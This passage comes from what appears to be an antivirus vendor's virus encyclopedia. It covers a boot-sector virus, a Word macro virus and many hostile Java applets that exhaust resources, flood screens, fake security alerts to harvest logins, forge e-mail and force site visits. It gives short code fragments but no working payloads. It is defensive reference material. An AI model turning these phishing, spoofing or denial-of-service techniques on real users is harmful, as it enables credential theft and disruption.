  31139.             MAR 8      SEP 20
  31140.             APR 10     OCT 22
  31141.             MAY 12     NOV 24
  31142.             JUN 14     DEC 26
  31143.  
  31144. On these dates, the virus will not overwrite the Master Boot Sector
  31145. which will render the current drive unbootable. Decrypted text
  31146. string can be seen in the viral code:
  31147.  
  31148.      "<by:Wai-Chan,Aug94,UCV>"
  31149.  
  31150. Variant:
  31151. Like BYWAY-A, on the trigger dates, the virus will not overwrite the
  31152. Master Boot Sector which will render the current drive unbootable.
  31153. The decrypted viral code contains the following text strings:
  31154.  
  31155.                 "The-HndV"
  31156.                 "By:W.Chan-N"
  31157.  
  31158. Damage: Corrupts the Master Boot Sector.
  31159.  
  31160. Symptom: Infected files cannot be overwritten or deleted in the their
  31161. current directories.
  31162.  
  31163. [Word_Kilo.B]
  31164. Virus name: Word.Kilo.B
  31165. Alias: None
  31166. Platform: Word 6/7
  31167. Number of macros: 3
  31168. Encrypted: Yes
  31169. Size of macros: 3440 Bytes
  31170. Place of origin: Malaysia
  31171. Date of origin: May 15, 1997
  31172. Destructive: No
  31173. Trigger date: None
  31174. Password: None
  31175. Seen In The Wild: No
  31176. Seen where:
  31177.  
  31178. Word.Kilo-B is another macro virus created in Malaysia. This virus
  31179. does not do anything but infect the global template and further
  31180. documents.
  31181.  
  31182. The virus has two (2) macros when infecting DOC files, and three (3)
  31183. macros when infecting the global template. The macro names are:
  31184.  
  31185.   FileClose
  31186.   Toolsmacro
  31187.   FileTemplates
  31188.  
  31189. The following information can be found in the macro code:
  31190.  
  31191. REM  a Virus from NoMercy!!!
  31192. REM  http://www.geocities.com/researchtriangle/3996
  31193. REM  any critics, suggestions are welcome!
  31194.  
  31195. The macro code seems like it is not encrypted. It only becomes
  31196. encrypted after infection.
  31197.  
  31198. [JAVA_NoisyBear]
  31199.  
  31200. This hostile Java applet displays an image of a bear with a
  31201. clock on his stomach (FILE USED: sunbear.jpg). This bear makes
  31202. noises and only stops when you close your Internet browser.
  31203.  
  31204. [JAVA_Wasteful]
  31205.  
  31206. This hostile Java applet clogs your CPU to waste system resources.
  31207.  
  31208. [JAVA_Consume]
  31209.  
  31210. This hostile Java applet clogs your CPU and eats up your system
  31211. memory.
  31212.  
  31213. [JAVA_HostileTrd]
  31214.  
  31215. This hostile Java applet tries to create threads, which will occupy
  31216. specific resources:
  31217.  
  31218. WasteResources[I] = new Thread(a);
  31219. Such that I = 0 to 999.
  31220.  
  31221. As such, resources are eaten up.
  31222. The applet ends by prompting: "I'm a friendly applet!"
  31223.  
  31224. [JAVA_AtkThread]
  31225.  
  31226. This hostile Java applet opens large black windows using the
  31227. command:
  31228.  
  31229. littleWindow = new AttackFrame("ACK!");
  31230.  
  31231. This window gradually increases in size. This process loops
  31232. indefinitely. In effect, these black windows will cover the
  31233. workspace or the original window.
  31234.  
  31235. [JAVA_TripleTrt]
  31236.  
  31237. This hostile Java applet opens large black windows. Commands used
  31238. are similar with the Java applet AtkThread. In effect, these
  31239. black windows will cover the workspace or the original window.
  31240. This applet also emits a very distracting noise (FILE USED:
  31241. whistle.au).
  31242.  
  31243. [JAVA_Ungrateful]
  31244.  
  31245. This hostile Java applet displays a fake security error, prompting
  31246. the user to re-log into his/her system. Upon logging in, the user
  31247. information (i.e., user name and password) is then forwarded to the
  31248. hostile applet home, where it will be used to gain access to the
  31249. user's system. This therefore exposes the system to the applet's
  31250. hostility.
  31251.  
  31252. In the end, the applet prompts: "All Applets Are Trustworthy!"
  31253.  
  31254. [JAVA_ErrMessage]
  31255.  
  31256. Similar to the Ungrateful Java applet in that it displays a fake
  31257. security error.
  31258.  
  31259. A window appears with these messages:
  31260.  
  31261.   "Netscape Security Alert:
  31262.    There is an attempt to violate
  31263.    your system's security.
  31264.    To restart Netscape securely,
  31265.    login to your local system."
  31266.  
  31267. The applet then asks the user to re-log into his/her system. Upon
  31268. entering the login information (i.e., user name and password), this
  31269. information is forwarded to the hostile applet home, where it will
  31270. be used to gain access to the user's system. This therefore exposes
  31271. the system to the applet's hostility.
  31272.  
  31273. It uses the following codes:
  31274.  
  31275. sendIt = new Login(myPort);
  31276. sendit.communicate(user, psword);
  31277. hostility codes follow
  31278.  
  31279. [JAVA_SilentTrt]
  31280.  
  31281. This hostile Java applet is similar to the AtkThread Java applet in
  31282. that it opens large black windows. In effect, these black windows
  31283. will cover the workspace or the original window.
  31284.  
  31285. [JAVA_Login]
  31286.  
  31287. This hostile Java applet retrieves information needed for the user's
  31288. system to communicate with the Java applet's home.
  31289.  
  31290. [JAVA_LoginSvrSkt]
  31291.  
  31292. This hostile Java applet establishes a socket server, which will
  31293. receive data from the Java applet Ungrateful.
  31294.  
  31295. [JAVA_DoMyWork]
  31296.  
  31297. This hostile Java applet prompts the user to do some mathematical
  31298. calculations. The results of these calculations are sent to the
  31299. applet's home.
  31300.  
  31301. The applet does not present any damages, except for the work put
  31302. upon the user. In the end, the applet prompts: "I'm Not Doing
  31303. Anything!"
  31304.  
  31305. [JAVA_Calculator]
  31306.  
  31307. This hostile Java applet just calls the applet DoMyWork.
  31308.  
  31309. [JAVA_Report]
  31310.  
  31311. This hostile Java applet retrieves information needed for the user's
  31312. system to communicate with the Java applet's home.
  31313.  
  31314. It uses:
  31315. public void function communicate(String testtr, String factorstr)
  31316.  
  31317. [JAVA_RptSvrSkt]
  31318.  
  31319. This hostile Java applet establishes a socket server, which will
  31320. receive data from the Java applet DoMyWork.
  31321.  
  31322. [JAVA_PenPal]
  31323.  
  31324. This hostile Java applet forges the user's electronic mail. It changes
  31325. the return address name with: "penpal@" plus mailFrom which is set as
  31326. "my.hostile.applet." This mail will be sent to any recipient
  31327. classified as toMe. The mail is sent using mailPort 25, which the user
  31328. has no control over. A new message will be sent under the public void
  31329. function run()using mailMe.
  31330.  
  31331. This hostile Java applet is similar to the Java applet Forger.
  31332.  
  31333. [JAVA_Forger]
  31334.  
  31335. This hostile Java applet forges the user's electronic mail. It changes
  31336. the return address name with: "HostileApplets@" plus mailFrom which
  31337. is set as "java.sun.com." This mail will be sent to any recipient
  31338. classified as toMe. The mail is sent using mailPort 25, which the user
  31339. has no control over. A new message will be sent under the public void
  31340. function run()using mailMe.
  31341.  
  31342. [JAVA_AppKiller]
  31343.  
  31344. This hostile Java applet eliminates other loaded Java applets. This
  31345. applet also has an error correction feature, which will restore its
  31346. own if it was killed by its own code.
  31347.  
  31348. [JAVA_ScapeGoat]
  31349.  
  31350. This hostile Java applet forces the browser to visit a certain web
  31351. site repeatedly. This therefore will open multiple browser windows.
  31352. The site is established within the code itself:
  31353.  
  31354. Site = new URL("...");
  31355.  
  31356. [JAVA_DblTrouble]
  31357.  
  31358. This hostile Java applet opens yellow and black windows. It is similar
  31359. to the Java applet AtkThread in terms of codes. In effect, these
  31360. yellow and black windows will cover the workspace or the original
  31361. window.
  31362.